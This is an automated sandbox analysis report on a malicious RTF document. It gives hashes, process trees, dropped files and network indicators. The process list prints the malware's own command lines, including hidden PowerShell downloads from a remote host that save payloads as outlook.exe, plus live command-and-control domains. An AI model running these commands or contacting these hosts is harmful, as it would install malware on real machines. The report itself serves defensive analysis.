analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

cb0d7e9b9a01c4fd2eb6af2384af661e

Full analysis: https://app.any.run/tasks/9d4a962b-4968-4be5-8e7c-f58bb985b947
Verdict: Malicious activity
Analysis date: July 18, 2019, 02:53:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

CB0D7E9B9A01C4FD2EB6AF2384AF661E

SHA1:

69DF6994D4B9632C4F575866C5A4B2156887CCA1

SHA256:

A4503460EF3A2F5EAC6EFF323CEC12AE260C7D1EA172AF4603B262A607CE619E

SSDEEP:

768:qaKf8YDEX6w3Mz6B7hEfHPtEU7CPJF4u+OmaRB4nJjOhi/WDf+DfP5dlAZkY7S4P:qfN4CHmUWX4ZO3KMhpD8P5DnY7ScttN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2492)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2492)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2664)
      • cmd.exe (PID: 2144)
      • cmd.exe (PID: 2524)
      • cmd.exe (PID: 3620)
      • cmd.exe (PID: 3748)
      • cmd.exe (PID: 2236)
      • cmd.exe (PID: 2744)
    • Writes to a start menu file

      • WScript.exe (PID: 2536)
      • amsi.dll (PID: 2552)
      • wscript.exe (PID: 3364)
      • amsi.dll (PID: 4044)
    • Application was dropped or rewritten from another process

      • WScript.exe (PID: 2536)
      • amsi.dll (PID: 2552)
      • wscript.exe (PID: 3364)
      • outlook.exe (PID: 2564)
      • amsi.dll (PID: 4044)
      • outlook.exe (PID: 3600)
      • outlook.exe (PID: 2572)
      • outlook.exe (PID: 3284)
    • Loads dropped or rewritten executable

      • WScript.exe (PID: 2536)
      • cmd.exe (PID: 2664)
      • amsi.dll (PID: 2552)
      • wscript.exe (PID: 3364)
    • Changes the autorun value in the registry

      • amsi.dll (PID: 2552)
      • amsi.dll (PID: 4044)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2492)
      • excelcnv.exe (PID: 3192)
    • Executes scripts

      • cmd.exe (PID: 2664)
      • amsi.dll (PID: 2552)
    • Creates files in the user directory

      • WScript.exe (PID: 2536)
      • powershell.exe (PID: 3896)
      • powershell.exe (PID: 3084)
      • powershell.exe (PID: 3080)
      • powershell.exe (PID: 2752)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 2536)
      • powershell.exe (PID: 3896)
      • AdobeARM.exe (PID: 3348)
    • Starts itself from another location

      • WScript.exe (PID: 2536)
      • amsi.dll (PID: 2552)
      • wscript.exe (PID: 3364)
    • Starts application with an unusual extension

      • WScript.exe (PID: 2536)
      • wscript.exe (PID: 3364)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2536)
      • wscript.exe (PID: 3364)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2536)
      • wscript.exe (PID: 3364)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 3840)
      • cmd.exe (PID: 2704)
    • Reads Internet Cache Settings

      • amsi.dll (PID: 2552)
      • amsi.dll (PID: 4044)
    • Creates files in the program directory

      • AdobeARM.exe (PID: 3348)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3532)
      • EXCEL.EXE (PID: 2492)
      • excelcnv.exe (PID: 3192)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3532)
      • EXCEL.EXE (PID: 2492)
    • Application launched itself

      • AcroRd32.exe (PID: 2324)
      • RdrCEF.exe (PID: 3320)
      • AcroRd32.exe (PID: 2948)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57433
CharactersWithSpaces: 39
Characters: 34
Words: 6
Pages: 1
TotalEditTime: 3 minutes
RevisionNumber: 1
ModifyDate: 2019:06:13 02:00:00
CreateDate: 2019:06:13 01:57:00
LastModifiedBy: Karla
Author: Karla
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
89
Monitored processes
44
Malicious processes
6
Suspicious processes
6

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe cmd.exe no specs ping.exe no specs wscript.exe amsi.dll powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs excelcnv.exe no specs ping.exe no specs ping.exe no specs ping.exe no specs taskkill.exe no specs taskkill.exe no specs wscript.exe outlook.exe acrord32.exe acrord32.exe no specs amsi.dll powershell.exe no specs cmd.exe no specs cmd.exe no specs ping.exe no specs powershell.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs ping.exe no specs taskkill.exe no specs taskkill.exe no specs outlook.exe no specs rdrcef.exe no specs rdrcef.exe no specs rdrcef.exe no specs outlook.exe no specs acrord32.exe no specs acrord32.exe no specs outlook.exe no specs adobearm.exe reader_sl.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3532"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\cb0d7e9b9a01c4fd2eb6af2384af661e.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
2492"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2664"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & start C:\Users\Public\WindowsDefender.vbsC:\Windows\System32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3288ping 127.0.0.1 -n 5 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2536"C:\Windows\System32\WScript.exe" "C:\Users\Public\WindowsDefender.vbs" C:\Windows\System32\WScript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2552"C:\Users\admin\AppData\Local\Temp\amsi.dll" "C:\Users\Public\WindowsDefender.vbs"C:\Users\admin\AppData\Local\Temp\amsi.dll
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3896"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://ciginfo.websiteseguro.com/logs/async.mp3','C:\Users\Public\outlook.exe')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2144"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\outlook.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2524"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 15 > nul & start ,C:\Users\Public\outlook.exeC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3084"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://ciginfo.websiteseguro.com/logs/documento.mp3','C:\Users\admin\AppData\Local\Temp\documento.pdf')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
4 215
Read events
3 752
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
12
Text files
36
Unknown types
19

Dropped files

PID
Process
Filename
Type
3532WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE997.tmp.cvr
MD5:
SHA256:
2492EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRF1F3.tmp.cvr
MD5:
SHA256:
2492EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFFDE9C1ABB7C5E1BE.TMP
MD5:
SHA256:
3192excelcnv.exeC:\Users\admin\AppData\Local\Temp\CVR13B4.tmp.cvr
MD5:
SHA256:
3896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2VK6SCXRT5WGP5EOPJ0V.temp
MD5:
SHA256:
3084powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q52B1JNVBAUA47YFI6ZD.temp
MD5:
SHA256:
2492EXCEL.EXEC:\Users\Public\WindowsDefender.vbstext
MD5:DAED6E226C8142E594B1CDB9CB5CF613
SHA256:75F0A5A64F83A36FCDD4142B7D5211EF02E9F7CA1FBD80EEF59B4DA108C3856D
2536WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.vbstext
MD5:DAED6E226C8142E594B1CDB9CB5CF613
SHA256:75F0A5A64F83A36FCDD4142B7D5211EF02E9F7CA1FBD80EEF59B4DA108C3856D
2492EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\VvGm345P[1].txttext
MD5:DAED6E226C8142E594B1CDB9CB5CF613
SHA256:75F0A5A64F83A36FCDD4142B7D5211EF02E9F7CA1FBD80EEF59B4DA108C3856D
3532WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F24FF4981AF1A4C323529305D47B66F2
SHA256:A4D0383BF0AC14C9D1A8CF03BBBF1E68CABBE68D6A545DAAEFF0F366FBA4E075
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
51
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2324
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip
unknown
whitelisted
2324
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip
unknown
whitelisted
2324
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip
unknown
whitelisted
2324
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/278_15_23_20070.zip
unknown
whitelisted
2324
AcroRd32.exe
GET
304
2.16.186.33:80
http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2552
amsi.dll
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2.18.233.74:443
ardownload2.adobe.com
Akamai International B.V.
whitelisted
2324
AcroRd32.exe
2.21.36.203:443
armmf.adobe.com
GTT Communications Inc.
FR
suspicious
3084
powershell.exe
191.252.51.54:443
ciginfo.websiteseguro.com
Locaweb Serviços de Internet S/A
BR
unknown
2564
outlook.exe
152.253.153.118:6606
soucdtevoceumcuzao.duckdns.org
TELEFÔNICA BRASIL S.A
BR
unknown
2492
EXCEL.EXE
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
4044
amsi.dll
152.246.81.100:9000
bylgay.hopto.org
TELEFÔNICA BRASIL S.A
BR
malicious
4044
amsi.dll
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2324
AcroRd32.exe
2.16.186.33:80
acroipm2.adobe.com
Akamai International B.V.
whitelisted
2.21.36.203:443
armmf.adobe.com
GTT Communications Inc.
FR
suspicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
ciginfo.websiteseguro.com
  • 191.252.51.54
unknown
soucdtevoceumcuzao.duckdns.org
  • 152.253.153.118
malicious
bylgay.hopto.org
  • 152.246.81.100
malicious
acroipm2.adobe.com
  • 2.16.186.33
  • 2.16.186.32
whitelisted
armmf.adobe.com
  • 2.21.36.203
whitelisted
ardownload2.adobe.com
  • 2.18.233.74
whitelisted

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
Process
Message
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!
outlook.exe
Disconnected!